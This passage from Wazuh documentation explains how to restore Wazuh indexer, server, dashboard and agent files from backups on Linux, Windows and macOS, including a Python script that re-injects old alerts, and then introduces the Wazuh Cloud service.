    parser.add_argument('-log', '--log_file', metavar='log_file', type=str, required = False, help='Logs output')
    parser.add_argument('-w', '--wazuh_path', metavar='wazuh_path', type=str, required = False, help='Path to Wazuh. By default:/var/ossec/')
    parser.add_argument('-sz', '--max_size', metavar='max_size', type=float, required = False, help='Max output file size in Gb. Default: 1Gb. Example: 2.5')
    
    args = parser.parse_args()
    
    if args.log_file:
        log_file = args.log_file
        f_log = open(log_file, 'a+')
    
    
    if args.max_size:
        max_size = args.max_size
    
    if args.wazuh_path:
        wazuh_path = args.wazuh_path
    
    output_file = args.output_file
    
    #Gb to bytes
    max_bytes = int(max_size * 1024 * 1024 * 1024)
    
    if (max_bytes <= 0):
        log("Error: Incorrect max_size")
        exit(1)
    
    month_dict = ['Null','Jan','Feb','Mar','Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov','Dec']
    
    if args.eps:
        EPS_MAX = args.eps
    
    if EPS_MAX < 0:
        log("Error: incorrect EPS")
        exit(1)
    
    min_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.min_timestamp)
    if min_date:
        min_year = int(min_date.group(1))
        min_month = int(min_date.group(2))
        min_day = int(min_date.group(3))
    else:
        log("Error: Incorrect min timestamp")
        exit(1)
    
    max_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.max_timestamp)
    if max_date:
        max_year = int(max_date.group(1))
        max_month = int(max_date.group(2))
        max_day = int(max_date.group(3))
    else:
        log("Error: Incorrect max timestamp")
        exit(1)
    
    # Converting timestamp args to datetime
    min_timestamp = datetime.strptime(args.min_timestamp, '%Y-%m-%dT%H:%M:%S')
    max_timestamp = datetime.strptime(args.max_timestamp, '%Y-%m-%dT%H:%M:%S')
    
    chunk = 0
    written_alerts = 0
    trimmed_alerts = open(output_file, 'w')
    
    max_time=datetime(max_year, max_month, max_day)
    current_time=datetime(min_year, min_month, min_day)
    
    while current_time <= max_time:
        alert_file = "{0}logs/alerts/{1}/{2}/ossec-alerts-{3:02}.json.gz".format(wazuh_path,current_time.year,month_dict[current_time.month],current_time.day)
    
        if os.path.exists(alert_file):
            daily_alerts = 0
            compressed_alerts = gzip.open(alert_file, 'r')
            log("Reading file: "+ alert_file)
            for line in compressed_alerts:
                # Transform line to json object
                try:
                    line_json = json.loads(line.decode("utf-8", "replace"))
    
                    # Remove unnecessary part of the timestamp
                    string_timestamp = line_json['timestamp'][:19]
    
                    # Ensure timestamp integrity
                    while len(line_json['timestamp'].split("+")[0]) < 23:
                        line_json['timestamp'] = line_json['timestamp'][:20] + "0" + line_json['timestamp'][20:]
    
                    # Get the timestamp readable
                    event_date = datetime.strptime(string_timestamp, '%Y-%m-%dT%H:%M:%S')
    
                    # Check the timestamp belongs to the selected range
                    if (event_date <= max_timestamp and event_date >= min_timestamp):
                        chunk+=1
                        trimmed_alerts.write(json.dumps(line_json))
                        trimmed_alerts.write("\n")
                        trimmed_alerts.flush()
                        daily_alerts += 1
                        if chunk >= EPS_MAX:
                            chunk = 0
                            time.sleep(2)
                        if os.path.getsize(output_file) >= max_bytes:
                            trimmed_alerts.close()
                            log("Output file reached max size, setting it to zero and restarting")
                            time.sleep(EPS_MAX/100)
                            trimmed_alerts = open(output_file, 'w')
    
                except ValueError as e:
                    print("Oops! Something went wrong reading: {}".format(line))
                    print("This is the error: {}".format(str(e)))
    
            compressed_alerts.close()
            log("Extracted {0} alerts from day {1}-{2}-{3}".format(daily_alerts,current_time.day,month_dict[current_time.month],current_time.year))
        else:
            log("Couldn't find file {}".format(alert_file))
    
        #Move to next file
        current_time += timedelta(days=1)
    
    trimmed_alerts.close()
    

    While you run the recovery.py script, you need to consider the following parameters:

    usage: recovery.py [-h] [-eps eps] -min min_timestamp -max max_timestamp -o
                          output_file [-log log_file] [-w wazuh_path]
                          [-sz max_size]
    
      -eps eps, --eps eps   Events per second. Default: 400
      -min min_timestamp, --min_timestamp min_timestamp
                            Min timestamp. Example: 2019-11-13T08:42:17
      -max max_timestamp, --max_timestamp max_timestamp
                            Max timestamp. Example: 2019-11-13T23:59:06
      -o output_file, --output_file output_file
                            Alerts output file.
      -log log_file, --log_file log_file
                            Logs output.
      -w wazuh_path, --wazuh_path wazuh_path
                            Path to Wazuh. By default:/var/ossec/
      -sz max_size, --max_size max_size
                            Max output file size in Gb. Default: 1Gb. Example: 2.5
    
  3. Run the command below to make the recovery.py script executable:

    # chmod +x recovery.py
    
  4. Execute the script using nohup command in the background to keep it running after the session is closed. It may take time depending on the size of the old logs.

    Usage example:

    # nohup ./recovery.py -eps 500 -min 2023-06-10T00:00:00 -max 2023-06-18T23:59:59 -o /tmp/recovery.json -log ./recovery.log -sz 2.5 &
    
  5. Add the /tmp/recovery.json path to the Wazuh Filebeat module /usr/share/filebeat/module/wazuh/alerts/manifest.yml so that Filebeat sends the old alerts to the Wazuh indexer for indexing:

    module_version: 0.1
    
    var:
      - name: paths
        default:
          - /var/ossec/logs/alerts/alerts.json
          - /tmp/recovery.json
      - name: index_prefix
        default: wazuh-alerts-4.x-
    
    input: config/alerts.yml
    
    ingest_pipeline: ingest/pipeline.json
    
  6. Restart Filebeat for the changes to take effect:

    # systemctl restart filebeat
    
Verifying data restoration

Using the Wazuh dashboard, navigate to the Threat Hunting, File Integrity Monitoring, Vulnerability Detection, and any other modules to see if the data is restored successfully.

Multi-node data restoration

Perform the actions below to restore the Wazuh central components on their respective Wazuh nodes.

Preparing the data restoration
  1. Compress the files generated after performing Wazuh files backup and transfer them to the respective new servers:

    # tar -cvzf <SERVER_HOSTNAME>.tar.gz ~/wazuh_files_backup/
    

    Where:

    • <SERVER_HOSTNAME> represents the current server name. Consider adding the naming convention, _indexer, _server, _dashboard if the current hostnames don’t specify them.

    Note

    Make sure that Wazuh indexer compressed files are transferred to the new Wazuh indexer nodes, Wazuh server compressed files are transferred to the new Wazuh server nodes, and Wazuh dashboard compressed files are transferred to the new Wazuh dashboard nodes.

  2. Move the compressed file to the root / directory of each node:

    # mv <SERVER_HOSTNAME>.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files:

    # tar -xzvf <SERVER_HOSTNAME>.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh indexer files

You need to have a new installation of Wazuh indexer. Follow the Wazuh indexer - Installation guide to perform a fresh Wazuh indexer installation.

Perform the following steps on each Wazuh indexer node.

  1. Stop the Wazuh indexer to prevent any modification to the Wazuh indexer files during the restore process:

    # systemctl stop wazuh-indexer
    
  2. Restore the Wazuh indexer configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options
    # sudo cp etc/wazuh-indexer/jvm.options.d /etc/wazuh-indexer/jvm.options.d
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/jvm.options.d
    # sudo cp etc/wazuh-indexer/log4j2.properties /etc/wazuh-indexer/log4j2.properties
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/log4j2.properties
    # sudo cp etc/wazuh-indexer/opensearch.keystore /etc/wazuh-indexer/opensearch.keystore
    # chown wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch.keystore
    # sudo cp -r etc/wazuh-indexer/opensearch-observability/* /etc/wazuh-indexer/opensearch-observability/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-observability/
    # sudo cp -r etc/wazuh-indexer/opensearch-reports-scheduler/* /etc/wazuh-indexer/opensearch-reports-scheduler/
    # chown -R wazuh-indexer:wazuh-indexer /etc/wazuh-indexer/opensearch-reports-scheduler/
    # sudo cp usr/lib/sysctl.d/wazuh-indexer.conf /usr/lib/sysctl.d/wazuh-indexer.conf
    
  3. Start the Wazuh indexer service:

    # systemctl start wazuh-indexer
    
Restoring Wazuh server files

You need to have a new installation of a Wazuh server. Follow the Wazuh server - Installation guide to perform a multi-node Wazuh server installation. There will be at least one master node and one worker node as node types. Perform the steps below, considering your node type.

  1. Stop the Wazuh manager and Filebeat to prevent any modification to the Wazuh server files during the restore process:

    # systemctl stop filebeat
    # systemctl stop wazuh-manager
    
  2. Copy Wazuh server data and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp etc/filebeat/filebeat.reference.yml /etc/filebeat/
    # sudo cp etc/filebeat/fields.yml /etc/filebeat/
    # sudo cp -r etc/filebeat/modules.d/* /etc/filebeat/modules.d/
    # sudo cp -r etc/postfix/* /etc/postfix/
    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/client.keys
    # sudo cp -r var/ossec/etc/sslmanager* /var/ossec/etc/
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/rules/* /var/ossec/etc/rules/
    # chown -R wazuh:wazuh /var/ossec/etc/rules/
    # sudo cp -r var/ossec/etc/decoders/* /var/ossec/etc/decoders
    # chown -R wazuh:wazuh /var/ossec/etc/decoders/
    # sudo cp -r var/ossec/etc/shared/*  /var/ossec/etc/shared/
    # chown -R wazuh:wazuh /var/ossec/etc/shared/
    # chown root:wazuh /var/ossec/etc/shared/ar.conf
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/agentless/*  /var/ossec/queue/agentless/
    # chown -R wazuh:wazuh /var/ossec/queue/agentless/
    # sudo cp var/ossec/queue/agents-timestamp /var/ossec/queue/
    # chown root:wazuh /var/ossec/queue/agents-timestamp
    # sudo cp -r var/ossec/queue/fts/* /var/ossec/queue/fts/
    # chown -R wazuh:wazuh /var/ossec/queue/fts/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    # sudo cp -r var/ossec/stats/* /var/ossec/stats/
    # chown -R wazuh:wazuh /var/ossec/stats/
    # sudo cp -r var/ossec/var/multigroups/* /var/ossec/var/multigroups/
    # chown -R wazuh:wazuh /var/ossec/var/multigroups/
    
  3. Restore certificates for Wazuh agent and Wazuh server communication, and additional configuration files if present:

    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp var/ossec/etc/authd.pass /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/authd.pass
    
  4. Restore your custom files. If you have custom active response scripts, CDB lists, integrations, or wodle commands, adapt the following commands accordingly:

    # sudo cp var/ossec/active-response/bin/<CUSTOM_AR_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_AR_SCRIPT>
    # sudo cp var/ossec/etc/lists/<USER_CDB_LIST>.cdb /var/ossec/etc/lists/
    # chown root:wazuh /var/ossec/etc/lists/<USER_CDB_LIST>.cdb
    # sudo cp var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT> /var/ossec/integrations/
    # chown root:wazuh /var/ossec/integrations/<CUSTOM_INTEGRATION_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  5. Restore the Wazuh databases that contain collected data from Wazuh agents:

    # sudo cp var/ossec/queue/db/* /var/ossec/queue/db/
    # chown -R wazuh:wazuh /var/ossec/queue/db/
    
  6. Start the Filebeat service:

    # systemctl start filebeat
    
  7. Start the Wazuh manager service:

    # systemctl start wazuh-manager
    
Restoring Wazuh dashboard files

You need to have a new installation of the Wazuh dashboard. Follow Wazuh dashboard - Installation guide to perform Wazuh dashboard installation.

Perform the following steps to restore Wazuh reports and custom images on the new server if you have any from your backup.

  1. Restore your Wazuh reports using the following command:

    # mkdir -p /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # sudo cp -r usr/share/wazuh-dashboard/data/wazuh/downloads/reports/* /usr/share/wazuh-dashboard/data/wazuh/downloads/reports/
    # chown -R wazuh-dashboard:wazuh-dashboard /usr/share/wazuh-dashboard/data/wazuh/downloads/
    
  2. Navigate to Dashboard management > App Settings > Custom branding from the Wazuh dashboard and upload your custom images.

Restoring old logs

Wazuh, by default, compresses logs that are older than a day. While performing log restoration in the Restoring Wazuh server files section, the old logs remain compressed.

Perform the following actions on both master and worker nodes of your Wazuh server to decompress the old logs and re-inject them for indexing to the Wazuh indexer.

Note

Restoring old logs will have a creation date of the day when the restoration is performed.

  1. Create a Python script called recovery.py on your Wazuh server. This script decompresses all the old logs and stores them in the recovery.json file in /tmp directory.

    # touch recovery.py
    
  2. Add the following content to the recovery.py script:

    #!/usr/bin/env python
    
    import gzip
    import time
    import json
    import argparse
    import re
    import os
    from datetime import datetime
    from datetime import timedelta
    
    def log(msg):
        now_date = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
        final_msg = "{0} wazuh-reinjection: {1}".format(now_date, msg)
        print(final_msg)
        if log_file:
            f_log.write(final_msg + "\n")
    
    EPS_MAX = 400
    wazuh_path = '/var/ossec/'
    max_size=1
    log_file = None
    
    parser = argparse.ArgumentParser(description='Reinjection script')
    parser.add_argument('-eps','--eps', metavar='eps', type=int, required = False, help='Events per second.')
    parser.add_argument('-min', '--min_timestamp', metavar='min_timestamp', type=str, required = True, help='Min timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-max', '--max_timestamp', metavar='max_timestamp', type=str, required = True, help='Max timestamp. Example: 2017-12-13T23:59:06')
    parser.add_argument('-o', '--output_file', metavar='output_file', type=str, required = True, help='Output filename.')
    parser.add_argument('-log', '--log_file', metavar='log_file', type=str, required = False, help='Logs output')
    parser.add_argument('-w', '--wazuh_path', metavar='wazuh_path', type=str, required = False, help='Path to Wazuh. By default:/var/ossec/')
    parser.add_argument('-sz', '--max_size', metavar='max_size', type=float, required = False, help='Max output file size in Gb. Default: 1Gb. Example: 2.5')
    
    args = parser.parse_args()
    
    if args.log_file:
        log_file = args.log_file
        f_log = open(log_file, 'a+')
    
    
    if args.max_size:
        max_size = args.max_size
    
    if args.wazuh_path:
        wazuh_path = args.wazuh_path
    
    output_file = args.output_file
    
    #Gb to bytes
    max_bytes = int(max_size * 1024 * 1024 * 1024)
    
    if (max_bytes <= 0):
        log("Error: Incorrect max_size")
        exit(1)
    
    month_dict = ['Null','Jan','Feb','Mar','Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov','Dec']
    
    if args.eps:
        EPS_MAX = args.eps
    
    if EPS_MAX < 0:
        log("Error: incorrect EPS")
        exit(1)
    
    min_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.min_timestamp)
    if min_date:
        min_year = int(min_date.group(1))
        min_month = int(min_date.group(2))
        min_day = int(min_date.group(3))
    else:
        log("Error: Incorrect min timestamp")
        exit(1)
    
    max_date = re.search('(\\d\\d\\d\\d)-(\\d\\d)-(\\d\\d)T\\d\\d:\\d\\d:\\d\\d', args.max_timestamp)
    if max_date:
        max_year = int(max_date.group(1))
        max_month = int(max_date.group(2))
        max_day = int(max_date.group(3))
    else:
        log("Error: Incorrect max timestamp")
        exit(1)
    
    # Converting timestamp args to datetime
    min_timestamp = datetime.strptime(args.min_timestamp, '%Y-%m-%dT%H:%M:%S')
    max_timestamp = datetime.strptime(args.max_timestamp, '%Y-%m-%dT%H:%M:%S')
    
    chunk = 0
    written_alerts = 0
    trimmed_alerts = open(output_file, 'w')
    
    max_time=datetime(max_year, max_month, max_day)
    current_time=datetime(min_year, min_month, min_day)
    
    while current_time <= max_time:
        alert_file = "{0}logs/alerts/{1}/{2}/ossec-alerts-{3:02}.json.gz".format(wazuh_path,current_time.year,month_dict[current_time.month],current_time.day)
    
        if os.path.exists(alert_file):
            daily_alerts = 0
            compressed_alerts = gzip.open(alert_file, 'r')
            log("Reading file: "+ alert_file)
            for line in compressed_alerts:
                # Transform line to json object
                try:
                    line_json = json.loads(line.decode("utf-8", "replace"))
    
                    # Remove unnecessary part of the timestamp
                    string_timestamp = line_json['timestamp'][:19]
    
                    # Ensure timestamp integrity
                    while len(line_json['timestamp'].split("+")[0]) < 23:
                        line_json['timestamp'] = line_json['timestamp'][:20] + "0" + line_json['timestamp'][20:]
    
                    # Get the timestamp readable
                    event_date = datetime.strptime(string_timestamp, '%Y-%m-%dT%H:%M:%S')
    
                    # Check the timestamp belongs to the selected range
                    if (event_date <= max_timestamp and event_date >= min_timestamp):
                        chunk+=1
                        trimmed_alerts.write(json.dumps(line_json))
                        trimmed_alerts.write("\n")
                        trimmed_alerts.flush()
                        daily_alerts += 1
                        if chunk >= EPS_MAX:
                            chunk = 0
                            time.sleep(2)
                        if os.path.getsize(output_file) >= max_bytes:
                            trimmed_alerts.close()
                            log("Output file reached max size, setting it to zero and restarting")
                            time.sleep(EPS_MAX/100)
                            trimmed_alerts = open(output_file, 'w')
    
                except ValueError as e:
                    print("Oops! Something went wrong reading: {}".format(line))
                    print("This is the error: {}".format(str(e)))
    
            compressed_alerts.close()
            log("Extracted {0} alerts from day {1}-{2}-{3}".format(daily_alerts,current_time.day,month_dict[current_time.month],current_time.year))
        else:
            log("Couldn't find file {}".format(alert_file))
    
        #Move to next file
        current_time += timedelta(days=1)
    
    trimmed_alerts.close()
    

    While you run the recovery.py script, you need to consider the following parameters:

    usage: recovery.py [-h] [-eps eps] -min min_timestamp -max max_timestamp -o
                          output_file [-log log_file] [-w wazuh_path]
                          [-sz max_size]
    
      -eps eps, --eps eps   Events per second. Default: 400
      -min min_timestamp, --min_timestamp min_timestamp
                            Min timestamp. Example: 2019-11-13T08:42:17
      -max max_timestamp, --max_timestamp max_timestamp
                            Max timestamp. Example: 2019-11-13T23:59:06
      -o output_file, --output_file output_file
                            Alerts output file.
      -log log_file, --log_file log_file
                            Logs output.
      -w wazuh_path, --wazuh_path wazuh_path
                            Path to Wazuh. By default:/var/ossec/
      -sz max_size, --max_size max_size
                            Max output file size in Gb. Default: 1Gb. Example: 2.5
    
  3. Run the command below to make the recovery.py script executable:

    # chmod +x recovery.py
    
  4. Execute the script using nohup command in the background to keep it running after the session is closed. It may take time depending on the size of the old logs.

    Usage example:

    # nohup ./recovery.py -eps 500 -min 2023-06-10T00:00:00 -max 2023-06-18T23:59:59 -o /tmp/recovery.json -log ./recovery.log -sz 2.5 &
    
  5. Add the /tmp/recovery.json path to the Wazuh Filebeat module /usr/share/filebeat/module/wazuh/alerts/manifest.yml so that Filebeat sends the old alerts to the Wazuh indexer for indexing:

    module_version: 0.1
    
    var:
      - name: paths
        default:
          - /var/ossec/logs/alerts/alerts.json
          - /tmp/recovery.json
      - name: index_prefix
        default: wazuh-alerts-4.x-
    
    input: config/alerts.yml
    
    ingest_pipeline: ingest/pipeline.json
    
  6. Restart Filebeat for the changes to take effect.

    # systemctl restart filebeat
    
Verifying data restoration

Using the Wazuh dashboard, navigate to the Threat Hunting, File Integrity Monitoring, Vulnerability Detection, and any other modules to see if the data is restored successfully.

Wazuh agent

Restore your Wazuh agent installation by following these steps.

Note

You need elevated privileges to execute the commands below.

Linux

You need to have a new installation of the Wazuh agent on a Linux endpoint. Follow the Deploying Wazuh agents on Linux endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the respective monitored endpoints.

    # tar -cvzf wazuh_agent.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the root / directory of your node:

    # mv wazuh_agent.tar.gz /
    # cd /
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files.

    # tar -xzvf wazuh_agent.tar.gz
    # cd ~/wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh agent files

Perform the steps below to restore the Wazuh agent files on a Linux endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process:

    # systemctl stop wazuh-agent
    
  2. Restore Wazuh agent data, certificates, and configuration files, and change the file permissions and ownerships accordingly:

    # sudo cp var/ossec/etc/client.keys /var/ossec/etc/
    # chown wazuh:wazuh /var/ossec/etc/client.keys
    # sudo cp var/ossec/etc/ossec.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/ossec.conf
    # sudo cp var/ossec/etc/internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/internal_options.conf
    # sudo cp var/ossec/etc/local_internal_options.conf /var/ossec/etc/
    # chown root:wazuh /var/ossec/etc/local_internal_options.conf
    # sudo cp -r var/ossec/etc/*.pem /var/ossec/etc/
    # chown -R root:wazuh /var/ossec/etc/*.pem
    # sudo cp -r var/ossec/logs/* /var/ossec/logs/
    # chown -R wazuh:wazuh /var/ossec/logs/
    # sudo cp -r var/ossec/queue/rids/* /var/ossec/queue/rids/
    # chown -R wazuh:wazuh /var/ossec/queue/rids/
    
  3. Restore your custom files such as local SCA policies, active response scripts, and wodle commands if there are any and change the file permissions. Adapt the following command accordingly.

    # sudo cp var/ossec/etc/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> /var/ossec/etc/<SCA_DIRECTORY>/
    # chown wazuh:wazuh /var/ossec/etc/custom-sca-files/<CUSTOM_SCA_FILE>
    # sudo cp var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /var/ossec/active-response/bin/
    # chown root:wazuh /var/ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT>
    # sudo cp var/ossec/wodles/<CUSTOM_WODLE_SCRIPT> /var/ossec/wodles/
    # chown root:wazuh /var/ossec/wodles/<CUSTOM_WODLE_SCRIPT>
    
  4. Start the Wazuh agent service:

    # systemctl start wazuh-agent
    
Windows

You need to have a new installation of the Wazuh agent on a Windows endpoint. Follow the Deploying Wazuh agents on Windows endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the Downloads directory of the respective agent endpoints.

  2. Decompress the file using 7-Zip or any of your preferred tools.

Restoring Wazuh agent files

Perform the steps below to restore Wazuh agent files on a Windows endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process by running the following command on PowerShell as an administrator:

    > NET STOP WazuhSvc
    
  2. Launch PowerShell as an administrator and navigate to the wazuh_files_backup/<DATE_TIME> folder that contains the backup files.

  3. Run the following commands to copy the Wazuh agent data, certificates, and configurations:

    > Copy-Item "$bkp_folder\client.keys" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\ossec.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\internal_options.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\local_internal_options.conf" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\*.pem" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\ossec.log" "C:\Program Files (x86)\ossec-agent" -Recurse -Force
    > Copy-Item "$bkp_folder\logs\*" "C:\Program Files (x86)\ossec-agent\logs" -Recurse -Force
    > Copy-Item "$bkp_folder\rids\*" "C:\Program Files (x86)\ossec-agent\rids" -Recurse -Force
    

    You can also copy these files using the drag and drop method.

  4. Restore your custom files, such as local SCA policies, active response scripts, and wodle commands, if there are any. Adapt the following command accordingly.

    # Example variables - replace with your actual file names and folders
    $SCA_DIRECTORY = "sca"
    $CUSTOM_SCA_FILE = "custom_sca.yml"
    $CUSTOM_ACTIVE_RESPONSE_SCRIPT = "my_response.ps1"
    $CUSTOM_WODLE_SCRIPT = "custom_wodle.py"
    
    > Copy-Item "$SCA_DIRECTORY\$CUSTOM_SCA_FILE" "C:\Program Files (x86)\ossec-agent\$SCA_DIRECTORY" -Recurse -Force
    > Copy-Item "active-response\bin\$CUSTOM_ACTIVE_RESPONSE_SCRIPT" "C:\Program Files (x86)\ossec-agent\active-response\bin" -Recurse -Force
    > Copy-Item "wodles\$CUSTOM_WODLE_SCRIPT" "C:\Program Files (x86)\ossec-agent\wodles" -Recurse -Force
    
  5. Start the Wazuh agent service by running the following command on the Command Prompt as an administrator:

    NET START WazuhSvc
    
macOS

You need to have a new installation of the Wazuh agent on a macOS endpoint. Follow the Deploying Wazuh agents on macOS endpoints guide to perform a fresh Wazuh agent installation.

Preparing the data restoration
  1. Compress the files generated after performing the Wazuh files backup and transfer them to the endpoint with the Wazuh agent installed.

    # tar -cvzf wazuh_agent.tar.gz ~/wazuh_files_backup/
    
  2. Move the compressed file to the Downloads directory of your node:

    # mv wazuh_agent.tar.gz ~/Downloads
    # cd ~/Downloads
    
  3. Decompress the backup files and change the current working directory to the directory based on the date and time of the backup files.

    # tar -xzvf wazuh_agent.tar.gz
    # cd wazuh_files_backup/<DATE_TIME>
    
Restoring Wazuh agent files

Perform the steps below to restore Wazuh agent files on a macOS endpoint.

  1. Stop the Wazuh agent to prevent any modification to the Wazuh agent files during the restore process:

    # launchctl bootout system /Library/LaunchDaemons/com.wazuh.agent.plist
    
  2. Restore Wazuh agent data, certificates, and configuration files:

    # cp Library/Ossec/etc/client.keys /Library/Ossec/etc/
    # cp Library/Ossec/etc/ossec.conf /Library/Ossec/etc/
    # cp Library/Ossec/etc/internal_options.conf /Library/Ossec/etc/
    # cp Library/Ossec/etc/local_internal_options.conf /Library/Ossec/etc/
    # cp -R Library/Ossec/etc/*.pem /Library/Ossec/etc/
    # cp -R Library/Ossec/logs/* /Library/Ossec/logs/
    # cp -R Library/Ossec/queue/rids/* /Library/Ossec/queue/rids/
    
  3. Restore custom files, such as local SCA policies, active response, and wodle scripts, if there are any.

    # sudo cp Library/Ossec/<SCA_DIRECTORY>/<CUSTOM_SCA_FILE> /Library/Ossec/<SCA_DIRECTORY>/
    # sudo cp Library/Ossec/active-response/bin/<CUSTOM_ACTIVE_RESPONSE_SCRIPT> /Library/Ossec/active-response/bin/
    # sudo cp Library/Ossec/wodles/<CUSTOM_WODLE_SCRIPT> /Library/Ossec/wodles/
    
  4. Start the Wazuh agent service:

    # launchctl bootstrap system /Library/LaunchDaemons/com.wazuh.agent.plist
    
Verifying data restoration
  1. Run the command below on your Wazuh server to check if the Wazuh agent is connected and active:

    # /var/ossec/bin/agent_control -l
    
  1. Using the Wazuh dashboard, navigate to Active agents. Select your Wazuh agent to see the data from the backup, such as Threat Hunting, Vulnerability Detection, Configuration Assessment, and others.

Wazuh Cloud service

Wazuh is a free and open source platform that delivers unified Security Information and Event Management (SIEM) and Extended Detection and Response (XDR) capabilities. It protects workloads across on-premises, virtualized, cloud, and containerized environments.

You can deploy Wazuh in three ways:

  • On-premises, managed entirely by you.

  • In your own cloud environment, under your control.

  • With Wazuh Cloud, a fully managed service operated by Wazuh.

Wazuh Cloud hosts and manages all central components in a unified, secure environment. The service provides fast provisioning, automated scaling, ongoing updates, and operational management, so you can focus on security operations rather than infrastructure.

Wazuh Cloud benefits

  • Fully managed service: We take care of installation, scaling, updates, and monitoring of Wazuh components.

  • Immediate time-to-value: A ready-to-use solution, with no additional hardware or software required, driving down the cost and complexity.

  • High availability and scalability: A flexible infrastructure that you can tailor to meet specific needs and upgrade it to the most appropriate tier.

  • Wazuh AI security analyst: Automate your security analysis and receive actionable insights to help you understand and strengthen your security posture.

  • Security and regulatory compliance: Fully protected data, regular application of security patches and hardening practices. Compliant with PCI DSS and SOC2.

  • Customizable environments: Tailor retention, integrations, and resources to match your needs.

  • Support and monitoring: Continuous monitoring of the platform and access to Wazuh technical support.

Shared responsibility model

With Wazuh Cloud, responsibilities are divided between the service and the customer.

Managed by Wazuh

  • Hosting, deployment, and maintenance of Wazuh central components.

  • Infrastructure monitoring, scaling, and high availability.

  • Security of the underlying platform.

  • Service updates and version upgrades.

Managed by customer

  • Deploying and configuring Wazuh agents on your endpoints.

  • Defining custom detection rules, alerting policies, and integrations.

  • Managing access control for your users.

  • Responding to incidents detected in your environment.

Learn more about Wazuh Cloud in the sections below.

Getting started

Wazuh Cloud eliminates the need to deploy, configure, or maintain the Wazuh platform yourself. All central components are automatically installed, updated, and scaled by the service. This allows you to focus on securing your environment and responding to threats, rather than managing the underlying infrastructure.

The steps below guide you from account creation to monitoring your endpoints.

Sign up for a trial

You can start with a free trial to create an environment and explore Wazuh Cloud service. Wazuh provides a 14-day free trial period.

Follow these steps to create your trial environment.

Note

No credit card is required to start the free trial. See the Wazuh Cloud page for information related to the Wazuh Cloud trial experience.

Signing up

Perform the following steps to sign up for a free trial:

  1. Go to the Wazuh Cloud page.

  2. Select Start your free trial.

  3. Fill in the required information and click Start free trial.

  4. Verify your email address.

Now you are ready to create your first environment.

Creating environment

Follow these steps to set up and run your environment:

  1. Log in to the Wazuh Cloud Console using your email address and password configured during registration.

  2. Click Create environment.

  3. Give your environment a name.

  4. Fill in the use case. This information helps us understand why our users utilize our service, allowing us to improve it accordingly.

  5. Select your preferred region for data residency. If you are not sure what to pick, select the region closest to your location to reduce latency for indexing and search requests.

  6. Select one of the available profiles: Small, Medium or Large. If none of these predefined profiles meets your requirements, select the Custom option to customize the settings.

    Metric

    Small

    Medium

    Large

    Active agents

    Up to 100

    Up to 250

    Up to 500

    Indexed data retention

    1 month

    3 Months

    3 Months

